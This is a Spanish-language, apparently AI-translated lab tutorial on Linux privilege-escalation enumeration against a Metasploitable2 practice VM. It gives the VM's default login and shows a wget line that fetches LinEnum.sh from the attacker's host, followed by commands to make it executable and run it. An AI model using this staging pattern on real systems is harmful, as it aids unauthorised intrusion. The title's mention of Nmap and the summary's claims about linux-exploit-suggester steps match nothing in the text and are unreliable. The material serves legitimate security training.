Explora las Herramientas de Escalada de Privilegios en Linux con Nmap

Beginner

💡 Este tutorial está traducido por IA desde la versión en inglés. Para ver la versión original, puedes hacer clic aquí

Introducción

En este laboratorio, exploraremos dos de las herramientas de automatización de escalada de privilegios en Linux más utilizadas: LinEnum y linux-exploit-suggester. El objetivo es aprender a aprovechar eficazmente estas herramientas para acelerar el proceso de escalada de privilegios durante una prueba de penetración o una evaluación de seguridad. Dominar estas herramientas puede ahorrar significativamente tiempo y esfuerzo, lo que te permitirá centrarte en comprender los principios y metodologías subyacentes de la escalada de privilegios.


Skills Graph

Configuración del entorno

En este paso, configuraremos la máquina virtual Metasploitable2, que servirá como nuestro sistema objetivo. Siga las instrucciones a continuación para iniciar la máquina virtual y establecer una conexión:

En nuestro entorno de laboratorio, la configuración de la máquina virtual Metasploitable2 ya ha sido preconfigurada. Puede iniciar la máquina virtual y conectarse a ella utilizando los siguientes pasos:

  1. Abra una terminal y ejecute el siguiente comando para iniciar la máquina virtual Metasploitable2:

    sudo virsh start Metasploitable2
  2. Espere de 1 a 2 minutos hasta que la máquina virtual se haya arrancado completamente y esté lista.

  3. Verifique que puede hacer ping a la dirección IP de Metasploitable2 (192.168.122.102) desde su máquina host.

  4. Utilice el siguiente comando para conectarse a la máquina virtual Metasploitable2 a través de SSH:

    ssh msfadmin@192.168.122.102

    En la primera conexión, se le pedirá que acepte la autenticidad del host. Escriba yes y presione Enter para continuar.

    Luego, ingrese la contraseña de msfadmin cuando se le solicite:

    msfadmin

Después de una autenticación exitosa, debería tener una sesión de shell con privilegios bajos en la máquina virtual Metasploitable2.

LinEnum: Automatización de la enumeración del sistema Linux

LinEnum es un potente script que automatiza el proceso de enumeración en un sistema Linux, recopilando información valiosa que puede ayudar en el proceso de escalada de privilegios. Siga los pasos a continuación para utilizar LinEnum en la máquina virtual Metasploitable2:

  1. En su máquina host, abra una terminal y navegue hasta el directorio /tmp:

    cd /tmp

    Hay un script llamado LinEnum.sh en el directorio /tmp del proyecto.

  2. Inicie un servidor HTTP de Python en el directorio /tmp para alojar el script LinEnum:

    python3 -m http.server 8000
  3. En la Máquina Virtual Metasploitable2, navegue hasta el directorio /tmp y descargue el script LinEnum utilizando wget desde el servidor HTTP de Python que se está ejecutando en su máquina host:

    Navegue hasta el directorio /tmp:

    cd /tmp
    wget 192.168.122.1:8000/LinEnum.sh -P /tmp
  4. Haga que el script LinEnum sea ejecutable:

    chmod +x LinEnum.sh
  5. Ejecute el script LinEnum y redirija la salida a un archivo para su posterior análisis:

    LinEnum.sh > linenum_output.txt

LinEnum realizará varias comprobaciones y enumerará la información del sistema, resaltando posibles vulnerabilidades o malas configuraciones en texto amarillo. Presta mucha atención a estas áreas resaltadas, ya que pueden revelar oportunidades para la escalada de privilegios.

Resumen

En este laboratorio, aprendimos cómo utilizar dos potentes herramientas de automatización, LinEnum y linux-exploit-suggester, para asistir en el proceso de escalada de privilegios en sistemas Linux. LinEnum proporciona una enumeración exhaustiva de la información del sistema, destacando posibles vulnerabilidades y malas configuraciones. La herramienta linux-exploit-suggester analiza la versión del kernel y sugiere exploits de kernel relevantes que podrían conducir a la escalada de privilegios.

Al aprovechar estas herramientas, podemos optimizar las fases de recopilación y análisis de información, ahorrando tiempo valioso durante una prueba de penetración o una evaluación de seguridad. Sin embargo, es fundamental entender que estas herramientas están destinadas a ayudar en el proceso, y una sólida comprensión de las técnicas y metodologías de escalada de privilegios sigue siendo esencial para una explotación exitosa.

A lo largo de este laboratorio, practicamos la configuración de un entorno de máquina virtual vulnerable, la descarga y ejecución de los scripts LinEnum y linux-exploit-suggester, y la interpretación de sus salidas. La experiencia práctica adquirida en este laboratorio será invaluable en escenarios del mundo real, donde la escalada de privilegios eficiente y efectiva es una habilidad crítica para hackers éticos y profesionales de seguridad.